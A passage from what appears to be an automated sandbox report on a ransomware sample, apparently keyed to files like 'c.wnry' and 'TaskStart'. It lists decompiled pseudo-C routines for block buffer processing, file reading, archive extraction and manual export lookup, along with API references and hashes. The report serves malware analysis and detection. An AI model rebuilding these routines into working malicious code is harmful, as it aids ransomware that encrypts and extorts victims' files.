                                                            						 *(_t194 + 0x10) = _t131 - _t163;
                                                            						_t133 =  *((intOrPtr*)(_t198 + 0x38));
                                                            						if(_t133 != 0) {
                                                            							_t135 =  *_t133( *((intOrPtr*)(_t198 + 0x3c)), _t169, _t163);
                                                            							 *((intOrPtr*)(_t198 + 0x3c)) = _t135;
                                                            							_t201 = _t201 + 0xc;
                                                            							 *((intOrPtr*)(_t194 + 0x30)) = _t135;
                                                            						}
                                                            						if(_t163 != 0) {
                                                            							memcpy(_v12, _a4, _t163);
                                                            							_v12 = _v12 + _t163;
                                                            							_a4 = _a4 + _t163;
                                                            						}
                                                            					}
                                                            					 *(_t194 + 0xc) = _v12;
                                                            					 *((intOrPtr*)(_t198 + 0x30)) = _a4;
                                                            					return _a8;
                                                            				} else {
                                                            					_t170 =  *(_t197 + 0x3cc);
                                                            					if(_t121 % _t170 != 0) {
                                                            						goto L15;
                                                            					} else {
                                                            						if(_a16 != 1) {
                                                            							_t195 = _a4;
                                                            							_t139 = _a12;
                                                            							_a16 = 0;
                                                            							_t164 = _a8;
                                                            							if(_a16 != 2) {
                                                            								_t140 = _t139 / _t170;
                                                            								if(_t140 > 0) {
                                                            									do {
                                                            										E00403797(_t197, _t195, _t164);
                                                            										_t172 =  *(_t197 + 0x3cc);
                                                            										_t195 = _t195 + _t172;
                                                            										_t143 = _a12 / _t172;
                                                            										_t164 = _t164 + _t172;
                                                            										_a16 = _a16 + 1;
                                                            									} while (_a16 < _t143);
                                                            									return _t143;
                                                            								}
                                                            							} else {
                                                            								_t140 = _t139 / _t170;
                                                            								if(_t140 > 0) {
                                                            									do {
                                                            										E0040350F(_t197, _t197 + 0x3f0, _t164);
                                                            										E00403A28(_t197, _t164, _t195);
                                                            										memcpy(_t197 + 0x3f0, _t195,  *(_t197 + 0x3cc));
                                                            										_t175 =  *(_t197 + 0x3cc);
                                                            										_t201 = _t201 + 0xc;
                                                            										_t150 = _a12 / _t175;
                                                            										_t195 = _t195 + _t175;
                                                            										_t164 = _t164 + _t175;
                                                            										_a16 = _a16 + 1;
                                                            									} while (_a16 < _t150);
                                                            									return _t150;
                                                            								}
                                                            							}
                                                            						} else {
                                                            							_t196 = _a4;
                                                            							_t140 = _a12 / _t170;
                                                            							_a16 = 0;
                                                            							_t165 = _a8;
                                                            							if(_t140 > 0) {
                                                            								do {
                                                            									E00403797(_t197, _t196, _t165);
                                                            									E00403A28(_t197, _t165, _t197 + 0x3f0);
                                                            									memcpy(_t197 + 0x3f0, _t196,  *(_t197 + 0x3cc));
                                                            									_t178 =  *(_t197 + 0x3cc);
                                                            									_t201 = _t201 + 0xc;
                                                            									_t140 = _a12 / _t178;
                                                            									_t196 = _t196 + _t178;
                                                            									_t165 = _t165 + _t178;
                                                            									_a16 = _a16 + 1;
                                                            								} while (_a16 < _t140);
                                                            							}
                                                            						}
                                                            						return _t140;
                                                            					}
                                                            				}
                                                            			}





































                                                            0x00403a7f
                                                            0x00403a87
                                                            0x00403a91
                                                            0x00403a9a
                                                            0x00403a9f
                                                            0x00403aa0
                                                            0x00403aa0
                                                            0x00403aa5
                                                            0x00403aaa
                                                            0x00403bba
                                                            0x00403bc2
                                                            0x00403bcb
                                                            0x00403bd0
                                                            0x00403bd1
                                                            0x00403bd9
                                                            0x00403bda
                                                            0x00403bdb
                                                            0x00403bdc
                                                            0x00403be0
                                                            0x00403be3
                                                            0x00403be6
                                                            0x00403be9
                                                            0x00403bee
                                                            0x00403bf1
                                                            0x00403bf4
                                                            0x00403bf6
                                                            0x00403bf6
                                                            0x00403bf9
                                                            0x00403bf9
                                                            0x00403bfc
                                                            0x00403c00
                                                            0x00403c02
                                                            0x00403c02
                                                            0x00403c06
                                                            0x00403c0e
                                                            0x00403c0e
                                                            0x00403c12
                                                            0x00403c17
                                                            0x00403c1a
                                                            0x00403c1f
                                                            0x00403c26
                                                            0x00403c28
                                                            0x00403c2b
                                                            0x00403c2e
                                                            0x00403c2e
                                                            0x00403c33
                                                            0x00403c3c
                                                            0x00403c41
                                                            0x00403c44
                                                            0x00403c47
                                                            0x00403c47
                                                            0x00403c4a
                                                            0x00403c50
                                                            0x00403c52
                                                            0x00403c58
                                                            0x00403c5b
                                                            0x00403c5d
                                                            0x00403c5d
                                                            0x00403c63
                                                            0x00403c63
                                                            0x00403c66
                                                            0x00403c6a
                                                            0x00403c6c
                                                            0x00403c6c
                                                            0x00403c70
                                                            0x00403c78
                                                            0x00403c78
                                                            0x00403c7c
                                                            0x00403c81
                                                            0x00403c84
                                                            0x00403c89
                                                            0x00403c90
                                                            0x00403c92
                                                            0x00403c95
                                                            0x00403c98
                                                            0x00403c98
                                                            0x00403c9d
                                                            0x00403ca6
                                                            0x00403cab
                                                            0x00403cb1
                                                            0x00403cb1
                                                            0x00403c9d
                                                            0x00403cb7
                                                            0x00403cbd
                                                            0x00403cc7
                                                            0x00403ab0
                                                            0x00403ab0
                                                            0x00403abc
                                                            0x00000000
                                                            0x00403ac2
                                                            0x00403ac6
                                                            0x00403b2c
                                                            0x00403b2f
                                                            0x00403b32
                                                            0x00403b35
                                                            0x00403b38
                                                            0x00403b8d
                                                            0x00403b91
                                                            0x00403b93
                                                            0x00403b97
                                                            0x00403b9c
                                                            0x00403ba7
                                                            0x00403ba9
                                                            0x00403bab
                                                            0x00403bad
                                                            0x00403bb0
                                                            0x00000000
                                                            0x00403b93
                                                            0x00403b3a
                                                            0x00403b3c
                                                            0x00403b40
                                                            0x00403b42
                                                            0x00403b4c
                                                            0x00403b55
                                                            0x00403b68
                                                            0x00403b6d
                                                            0x00403b78
                                                            0x00403b7b
                                                            0x00403b7d
                                                            0x00403b7f
                                                            0x00403b81
                                                            0x00403b84
                                                            0x00000000
                                                            0x00403b42
                                                            0x00403b40
                                                            0x00403ac8
                                                            0x00403acb
                                                            0x00403ace
                                                            0x00403ad0
                                                            0x00403ad3
                                                            0x00403ad8
                                                            0x00403ada
                                                            0x00403ade
                                                            0x00403aed
                                                            0x00403b00
                                                            0x00403b05
                                                            0x00403b10
                                                            0x00403b13
                                                            0x00403b15
                                                            0x00403b17
                                                            0x00403b19
                                                            0x00403b1c
                                                            0x00403ada
                                                            0x00403ad8
                                                            0x00403b25
                                                            0x00403b25
                                                            0x00403abc

                                                            APIs
                                                            • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,00000001), ref: 00403A91
                                                            • _CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,00000001), ref: 00403AA0
                                                            • memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 00403B00
                                                            • memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 00403B68
                                                            • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F574,?,?,?,?,?,00000001), ref: 00403BC2
                                                            • _CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,00000001), ref: 00403BD1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ??0exception@@ExceptionThrowmemcpy
                                                            • String ID:
                                                            • API String ID: 2382887404-0
                                                            • Opcode ID: 8f0cb0103d3614fdc28d84a5f541c19cbd02f6e6265a1098423f4cf3f0921468
                                                            • Instruction ID: 9805a50700f74263afb1320d00d27f30e93ca80038ec105a2d2f515762341bf2
                                                            • Opcode Fuzzy Hash: 8f0cb0103d3614fdc28d84a5f541c19cbd02f6e6265a1098423f4cf3f0921468
                                                            • Instruction Fuzzy Hash: 8541C870B40206ABDB14DE65DD81D9B77BEEB84309B00443FF815B3281D778AB15C759
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • fopen.MSVCRT(c.wnry,0040E018), ref: 0040101B
                                                            • fread.MSVCRT(?,0000030C,00000001,00000000), ref: 0040103F
                                                            • fwrite.MSVCRT(?,0000030C,00000001,00000000), ref: 00401047
                                                            • fclose.MSVCRT(00000000), ref: 00401058
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: fclosefopenfreadfwrite
                                                            • String ID: c.wnry
                                                            • API String ID: 4000964834-3240288721
                                                            • Opcode ID: 83356dae967f3845aa64eafaf8b7e6f79fd4dc7784855bee587f11601882f661
                                                            • Instruction ID: 4fc4ee2583eead98f325da0eb4a8e2a7a7827d82b7f69226d67b1691b23a23d5
                                                            • Opcode Fuzzy Hash: 83356dae967f3845aa64eafaf8b7e6f79fd4dc7784855bee587f11601882f661
                                                            • Instruction Fuzzy Hash: 0CF05931204260ABCA301F656D4AA277B10DBC4F61F10083FF1C1F40E2CABD44C296BE
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 24%
                                                            			E004018F9(intOrPtr _a4, intOrPtr _a8, CHAR* _a12) {
                                                            				struct _OVERLAPPED* _v8;
                                                            				char _v20;
                                                            				long _v32;
                                                            				struct _OVERLAPPED* _v36;
                                                            				long _v40;
                                                            				signed int _v44;
                                                            				void* _t18;
                                                            				void* _t28;
                                                            				long _t34;
                                                            				intOrPtr _t38;
                                                            
                                                            				_push(0xffffffff);
                                                            				_push(0x4081f0);
                                                            				_push(0x4076f4);
                                                            				_push( *[fs:0x0]);
                                                            				 *[fs:0x0] = _t38;
                                                            				_v44 = _v44 | 0xffffffff;
                                                            				_v32 = 0;
                                                            				_v36 = 0;
                                                            				_v8 = 0;
                                                            				_t18 = CreateFileA(_a12, 0x80000000, 1, 0, 3, 0, 0);
                                                            				_v44 = _t18;
                                                            				if(_t18 != 0xffffffff) {
                                                            					_t34 = GetFileSize(_t18, 0);
                                                            					_v40 = _t34;
                                                            					if(_t34 != 0xffffffff && _t34 <= 0x19000) {
                                                            						_t28 = GlobalAlloc(0, _t34);
                                                            						_v36 = _t28;
                                                            						if(_t28 != 0 && ReadFile(_v44, _t28, _t34,  &_v32, 0) != 0) {
                                                            							_push(_a8);
                                                            							_push(0);
                                                            							_push(0);
                                                            							_push(_v32);
                                                            							_push(_t28);
                                                            							_push(_a4);
                                                            							if( *0x40f898() != 0) {
                                                            								_push(1);
                                                            								_pop(0);
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            				_push(0xffffffff);
                                                            				_push( &_v20);
                                                            				L004076FA();
                                                            				 *[fs:0x0] = _v20;
                                                            				return 0;
                                                            			}













                                                            0x004018fc
                                                            0x004018fe
                                                            0x00401903
                                                            0x0040190e
                                                            0x0040190f
                                                            0x0040191c
                                                            0x00401922
                                                            0x00401925
                                                            0x00401928
                                                            0x0040193a
                                                            0x00401940
                                                            0x00401946
                                                            0x00401950
                                                            0x00401952
                                                            0x00401958
                                                            0x0040196a
                                                            0x0040196c
                                                            0x00401971
                                                            0x00401987
                                                            0x0040198a
                                                            0x0040198b
                                                            0x0040198c
                                                            0x0040198f
                                                            0x00401990
                                                            0x0040199b
                                                            0x0040199d
                                                            0x0040199f
                                                            0x0040199f
                                                            0x0040199b
                                                            0x00401971
                                                            0x00401958
                                                            0x004019a0
                                                            0x004019a5
                                                            0x004019a6
                                                            0x004019d5
                                                            0x004019e0

                                                            APIs
                                                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,00401448,?), ref: 0040193A
                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,00401448,?), ref: 0040194A
                                                            • GlobalAlloc.KERNEL32(00000000,00000000,?,?,?,?,?,?,00401448,?), ref: 00401964
                                                            • ReadFile.KERNEL32(000000FF,00000000,00000000,?,00000000,?,?,?,?,?,?,00401448,?), ref: 0040197D
                                                            • _local_unwind2.MSVCRT(?,000000FF,?,?,?,?,?,?,00401448,?), ref: 004019A6
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File$AllocCreateGlobalReadSize_local_unwind2
                                                            • String ID:
                                                            • API String ID: 2811923685-0
                                                            • Opcode ID: 232dc3714e51fefb2f6fb0f5b065eea7eb2b0009f41f45388587d49ab84ddf28
                                                            • Instruction ID: fb063a64e2dc49fc25d010f75d45645ced701e765f932c996de96a45c5b9f027
                                                            • Opcode Fuzzy Hash: 232dc3714e51fefb2f6fb0f5b065eea7eb2b0009f41f45388587d49ab84ddf28
                                                            • Instruction Fuzzy Hash: B62160B1901624AFCB209B99CD48FDF7E78EB097B0F54022AF525B22E0D7785805C6AC
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 97%
                                                            			E00405BAE(CHAR* _a4, intOrPtr _a8, long _a12, void* _a16) {
                                                            				char _v5;
                                                            				char _v6;
                                                            				long _t30;
                                                            				char _t32;
                                                            				long _t34;
                                                            				void* _t46;
                                                            				intOrPtr* _t49;
                                                            				long _t50;
                                                            
                                                            				_t30 = _a12;
                                                            				if(_t30 == 1 || _t30 == 2 || _t30 == 3) {
                                                            					_t49 = _a16;
                                                            					_t46 = 0;
                                                            					_v6 = 0;
                                                            					 *_t49 = 0;
                                                            					_v5 = 0;
                                                            					if(_t30 == 1) {
                                                            						_t46 = _a4;
                                                            						_v5 = 0;
                                                            						L11:
                                                            						_t30 = SetFilePointer(_t46, 0, 0, 1);
                                                            						_v6 = _t30 != 0xffffffff;
                                                            						L12:
                                                            						_push(0x20);
                                                            						L00407700();
                                                            						_t50 = _t30;
                                                            						if(_a12 == 1 || _a12 == 2) {
                                                            							 *_t50 = 1;
                                                            							 *((char*)(_t50 + 0x10)) = _v5;
                                                            							_t32 = _v6;
                                                            							 *((char*)(_t50 + 1)) = _t32;
                                                            							 *(_t50 + 4) = _t46;
                                                            							 *((char*)(_t50 + 8)) = 0;
                                                            							 *((intOrPtr*)(_t50 + 0xc)) = 0;
                                                            							if(_t32 != 0) {
                                                            								 *((intOrPtr*)(_t50 + 0xc)) = SetFilePointer(_t46, 0, 0, 1);
                                                            							}
                                                            						} else {
                                                            							 *_t50 = 0;
                                                            							 *((intOrPtr*)(_t50 + 0x14)) = _a4;
                                                            							 *((char*)(_t50 + 1)) = 1;
                                                            							 *((char*)(_t50 + 0x10)) = 0;
                                                            							 *((intOrPtr*)(_t50 + 0x18)) = _a8;
                                                            							 *((intOrPtr*)(_t50 + 0x1c)) = 0;
                                                            							 *((intOrPtr*)(_t50 + 0xc)) = 0;
                                                            						}
                                                            						 *_a16 = 0;
                                                            						_t34 = _t50;
                                                            						goto L18;
                                                            					}
                                                            					if(_t30 != 2) {
                                                            						goto L12;
                                                            					}
                                                            					_t46 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
                                                            					if(_t46 != 0xffffffff) {
                                                            						_v5 = 1;
                                                            						goto L11;
                                                            					}
                                                            					 *_t49 = 0x200;
                                                            					goto L8;
                                                            				} else {
                                                            					 *_a16 = 0x10000;
                                                            					L8:
                                                            					_t34 = 0;
                                                            					L18:
                                                            					return _t34;
                                                            				}
                                                            			}











                                                            0x00405bb2
                                                            0x00405bbb
                                                            0x00405bd2
                                                            0x00405bd7
                                                            0x00405bdc
                                                            0x00405bdf
                                                            0x00405be1
                                                            0x00405be4
                                                            0x00405c18
                                                            0x00405c1b
                                                            0x00405c24
                                                            0x00405c29
                                                            0x00405c32
                                                            0x00405c36
                                                            0x00405c36
                                                            0x00405c38
                                                            0x00405c42
                                                            0x00405c44
                                                            0x00405c6c
                                                            0x00405c6f
                                                            0x00405c72
                                                            0x00405c77
                                                            0x00405c7a
                                                            0x00405c7d
                                                            0x00405c80
                                                            0x00405c83
                                                            0x00405c90
                                                            0x00405c90
                                                            0x00405c4c
                                                            0x00405c4f
                                                            0x00405c51
                                                            0x00405c57
                                                            0x00405c5b
                                                            0x00405c5e
                                                            0x00405c61
                                                            0x00405c64
                                                            0x00405c64
                                                            0x00405c96
                                                            0x00405c98
                                                            0x00000000
                                                            0x00405c98
                                                            0x00405be9
                                                            0x00000000
                                                            0x00000000
                                                            0x00405c04
                                                            0x00405c09
                                                            0x00405c20
                                                            0x00000000
                                                            0x00405c20
                                                            0x00405c0b
                                                            0x00000000
                                                            0x00405bc7
                                                            0x00405bca
                                                            0x00405c11
                                                            0x00405c11
                                                            0x00405c9a
                                                            0x00405c9e
                                                            0x00405c9e

                                                            APIs
                                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001), ref: 00405BFE
                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001,00000000,004074EA,00000000), ref: 00405C29
                                                            • ??2@YAPAXI@Z.MSVCRT(00000020,?,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001,00000000,004074EA,00000000,004020D5,?), ref: 00405C38
                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001,00000000,004074EA), ref: 00405C8A
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File$Pointer$??2@Create
                                                            • String ID:
                                                            • API String ID: 1331958074-0
                                                            • Opcode ID: ff1e72f22e15843ade9ace39703012fff21b8a1e8b9c48cc3c9963cb15211f94
                                                            • Instruction ID: 771dcc1d5a31089dd4cc2aab62cbbe5a226dda330bf0289da8f54b52fc8588cb
                                                            • Opcode Fuzzy Hash: ff1e72f22e15843ade9ace39703012fff21b8a1e8b9c48cc3c9963cb15211f94
                                                            • Instruction Fuzzy Hash: 0831F231008784AFDB318F28888479BBBF4EF15350F18896EF491A7380C375AD85CB69
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 37%
                                                            			E00402924(intOrPtr* _a4, char _a8) {
                                                            				intOrPtr _v8;
                                                            				intOrPtr* _t26;
                                                            				intOrPtr* _t28;
                                                            				void* _t29;
                                                            				intOrPtr _t30;
                                                            				void* _t32;
                                                            				signed int _t33;
                                                            				signed int _t37;
                                                            				signed short* _t41;
                                                            				intOrPtr _t44;
                                                            				intOrPtr _t49;
                                                            				intOrPtr* _t55;
                                                            				intOrPtr _t58;
                                                            				void* _t59;
                                                            
                                                            				_t26 = _a4;
                                                            				_t44 =  *((intOrPtr*)(_t26 + 4));
                                                            				_t28 =  *_t26 + 0x78;
                                                            				_v8 = _t44;
                                                            				if( *((intOrPtr*)(_t28 + 4)) == 0) {
                                                            					L11:
                                                            					SetLastError(0x7f);
                                                            					_t29 = 0;
                                                            				} else {
                                                            					_t58 =  *_t28;
                                                            					_t30 =  *((intOrPtr*)(_t58 + _t44 + 0x18));
                                                            					_t59 = _t58 + _t44;
                                                            					if(_t30 == 0 ||  *((intOrPtr*)(_t59 + 0x14)) == 0) {
                                                            						goto L11;
                                                            					} else {
                                                            						_t8 =  &_a8; // 0x402150
                                                            						if( *_t8 >> 0x10 != 0) {
                                                            							_t55 =  *((intOrPtr*)(_t59 + 0x20)) + _t44;
                                                            							_t41 =  *((intOrPtr*)(_t59 + 0x24)) + _t44;
                                                            							_a4 = 0;
                                                            							if(_t30 <= 0) {
                                                            								goto L11;
                                                            							} else {
                                                            								while(1) {
                                                            									_t32 =  *_t55 + _t44;
                                                            									_t15 =  &_a8; // 0x402150
                                                            									__imp___stricmp( *_t15, _t32);
                                                            									if(_t32 == 0) {
                                                            										break;
                                                            									}
                                                            									_a4 = _a4 + 1;
                                                            									_t55 = _t55 + 4;
                                                            									_t41 =  &(_t41[1]);
                                                            									if(_a4 <  *((intOrPtr*)(_t59 + 0x18))) {
                                                            										_t44 = _v8;
                                                            										continue;
                                                            									} else {
                                                            										goto L11;
                                                            									}
                                                            									goto L12;
                                                            								}
                                                            								_t33 =  *_t41 & 0x0000ffff;
                                                            								_t44 = _v8;
                                                            								goto L14;
                                                            							}
                                                            						} else {
                                                            							_t9 =  &_a8; // 0x402150
                                                            							_t37 =  *_t9 & 0x0000ffff;
                                                            							_t49 =  *((intOrPtr*)(_t59 + 0x10));
                                                            							if(_t37 < _t49) {
                                                            								goto L11;
                                                            							} else {
                                                            								_t33 = _t37 - _t49;
                                                            								L14:
                                                            								if(_t33 >  *((intOrPtr*)(_t59 + 0x14))) {
                                                            									goto L11;
                                                            								} else {
                                                            									_t29 =  *((intOrPtr*)( *((intOrPtr*)(_t59 + 0x1c)) + _t33 * 4 + _t44)) + _t44;
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            				L12:
                                                            				return _t29;
                                                            			}

















                                                            0x00402928
                                                            0x0040292f
                                                            0x00402934
                                                            0x00402938
                                                            0x0040293e
                                                            0x004029a5
                                                            0x004029a7
                                                            0x004029ad
                                                            0x00402940
                                                            0x00402940
                                                            0x00402942
                                                            0x00402946
                                                            0x0040294a
                                                            0x00000000
                                                            0x00402951
                                                            0x00402951
                                                            0x0040295a
                                                            0x00402971
                                                            0x00402973
                                                            0x00402977
                                                            0x0040297a
                                                            0x00000000
                                                            0x0040297c
                                                            0x00402981
                                                            0x00402983
                                                            0x00402986
                                                            0x00402989
                                                            0x00402993
                                                            0x00000000
                                                            0x00000000
                                                            0x00402995
                                                            0x00402998
                                                            0x0040299f
                                                            0x004029a3
                                                            0x0040297e
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004029a3
                                                            0x004029b4
                                                            0x004029b7
                                                            0x00000000
                                                            0x004029b7
                                                            0x0040295c
                                                            0x0040295c
                                                            0x0040295c
                                                            0x00402960
                                                            0x00402965
                                                            0x00000000
                                                            0x00402967
                                                            0x00402967
                                                            0x004029ba
                                                            0x004029bd
                                                            0x00000000
                                                            0x004029bf
                                                            0x004029c8
                                                            0x004029c8
                                                            0x004029bd
                                                            0x00402965
                                                            0x0040295a
                                                            0x0040294a
                                                            0x004029af
                                                            0x004029b3

                                                            APIs
                                                            • _stricmp.MSVCRT(P!@,?,?,0000DDB6,?,?,?,00402150,00000000,TaskStart), ref: 00402989
                                                            • SetLastError.KERNEL32(0000007F,?,0000DDB6,?,?,?,00402150,00000000,TaskStart), ref: 004029A7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast_stricmp
                                                            • String ID: P!@
                                                            • API String ID: 1278613211-1774101457
                                                            • Opcode ID: 03c3627be8870cecb91afdd38bef801573c0f783d9791e09bb9b18ce57a97af9
                                                            • Instruction ID: aaf1e2d36ba78ebe43aa6e6aad127835d86855a49192f4e92224227a9dbc2408
                                                            • Opcode Fuzzy Hash: 03c3627be8870cecb91afdd38bef801573c0f783d9791e09bb9b18ce57a97af9
                                                            • Instruction Fuzzy Hash: 432180B1700605EFDB14CF19DA8486A73F6EF89310B29857AE846EB381D678ED41CB85
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 89%
                                                            			E00401DFE(void* __eax) {
                                                            				int _t21;
                                                            				signed int _t27;
                                                            				signed int _t29;
                                                            				void* _t34;
                                                            				void* _t36;
                                                            				void* _t38;
                                                            				void* _t40;
                                                            				void* _t41;
                                                            				void* _t43;
                                                            
                                                            				_t36 = __eax;
                                                            				_t41 = _t40 + 0xc;
                                                            				if(__eax != 0) {
                                                            					 *(_t38 - 0x12c) =  *(_t38 - 0x12c) & 0x00000000;
                                                            					_t29 = 0x4a;
                                                            					memset(_t38 - 0x128, 0, _t29 << 2);
                                                            					E004075C4(_t36, 0xffffffff, _t38 - 0x12c);
                                                            					_t27 =  *(_t38 - 0x12c);
                                                            					_t43 = _t41 + 0x18;
                                                            					_t34 = 0;
                                                            					if(_t27 > 0) {
                                                            						do {
                                                            							E004075C4(_t36, _t34, _t38 - 0x12c);
                                                            							_t21 = strcmp(_t38 - 0x128, "c.wnry");
                                                            							_t43 = _t43 + 0x14;
                                                            							if(_t21 != 0 || GetFileAttributesA(_t38 - 0x128) == 0xffffffff) {
                                                            								E0040763D(_t36, _t34, _t38 - 0x128);
                                                            								_t43 = _t43 + 0xc;
                                                            							}
                                                            							_t34 = _t34 + 1;
                                                            						} while (_t34 < _t27);
                                                            					}
                                                            					E00407656(_t36);
                                                            					_push(1);
                                                            					_pop(0);
                                                            				} else {
                                                            				}
                                                            				return 0;
                                                            			}












                                                            0x00401dfe
                                                            0x00401e00
                                                            0x00401e05
                                                            0x00401e0e
                                                            0x00401e1a
                                                            0x00401e21
                                                            0x00401e2d
                                                            0x00401e32
                                                            0x00401e38
                                                            0x00401e3b
                                                            0x00401e3f
                                                            0x00401e41
                                                            0x00401e4a
                                                            0x00401e5b
                                                            0x00401e60
                                                            0x00401e65
                                                            0x00401e82
                                                            0x00401e87
                                                            0x00401e87
                                                            0x00401e8a
                                                            0x00401e8b
                                                            0x00401e41
                                                            0x00401e90
                                                            0x00401e96
                                                            0x00401e98
                                                            0x00401e07
                                                            0x00401e07
                                                            0x00401e9d

                                                            APIs
                                                            • strcmp.MSVCRT(?,c.wnry,?,00000000,?), ref: 00401E5B
                                                            • GetFileAttributesA.KERNEL32(?), ref: 00401E6E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AttributesFilestrcmp
                                                            • String ID: c.wnry
                                                            • API String ID: 3324900478-3240288721
                                                            • Opcode ID: cc95b26050e750b8ddedfaa82b6fbbed5bde767aecf08ad1744914d0cf1c8067
                                                            • Instruction ID: 6f95607eaad4b3b0c5796a2914108af7bfa48759f01996e65d2c9759274caab0
                                                            • Opcode Fuzzy Hash: cc95b26050e750b8ddedfaa82b6fbbed5bde767aecf08ad1744914d0cf1c8067
                                                            • Instruction Fuzzy Hash: 3001C872D041142ADB209625DC41FEF336C9B45374F1005B7FA44F11C1E739AA998ADA
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 84%
                                                            			E00405C9F(signed int __eax, intOrPtr _a4) {
                                                            				intOrPtr _t9;
                                                            
                                                            				_t9 = _a4;
                                                            				if(_t9 != 0) {
                                                            					if( *((char*)(_t9 + 0x10)) != 0) {
                                                            						CloseHandle( *(_t9 + 4));
                                                            					}
                                                            					_push(_t9);
                                                            					L004076E8();
                                                            					return 0;
                                                            				} else {
                                                            					return __eax | 0xffffffff;
                                                            				}
                                                            			}




                                                            0x00405ca0
                                                            0x00405ca6
                                                            0x00405cb1
                                                            0x00405cb6
                                                            0x00405cb6
                                                            0x00405cbc
                                                            0x00405cbd
                                                            0x00405cc6
                                                            0x00405ca8
                                                            0x00405cac
                                                            0x00405cac

                                                            APIs
